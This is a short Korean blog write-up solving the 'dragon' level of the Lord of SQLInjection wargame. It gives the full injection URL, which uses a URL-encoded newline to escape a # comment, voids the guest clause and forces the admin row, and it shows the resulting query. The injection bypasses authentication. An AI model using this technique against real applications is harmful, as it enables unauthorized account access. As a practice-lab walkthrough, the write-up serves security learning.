20. LOS - DRAGON

혀누랑 함께 디코로 통화하면서 문제를 풀어서 훨씬 수월하게 풀었다.

현우는 개빡고수인게 분명하다.

처음에 이렇게 나와있는데,

#이 한줄 주석이니까 개행문자를 넣어줘서 풀면 될 것 같다고 생각했다.

앞에 guest가 있으니까 and연산으로 앞에를 무효화 시켜주고, 뒤를 or연산으로 admin 박아주면 풀릴것이다.

https://los.rubiya.kr/chall/dragon_51996aa769df79afbf79eb4d66dbcef6.php?pw=%27%0a%20and%20pw%20=%20-1%20or%20id%20=%20%27admin%27%20--%20-

이렇게 쿼리를 넣어주니까

query : select id from prob_dragon where id='guest'# and pw='' and pw = -1 or id = 'admin' -- -'

이런 쿼리문이 성립하고 admin 으로 풀렸다.

 

 

guest가 admin보다 db상에 위에 있어서 그냥 참을 만들어도 게스트 계정으로 들어가진다. 따라서 id ='admin'을 명확하게 넣어줘야한다.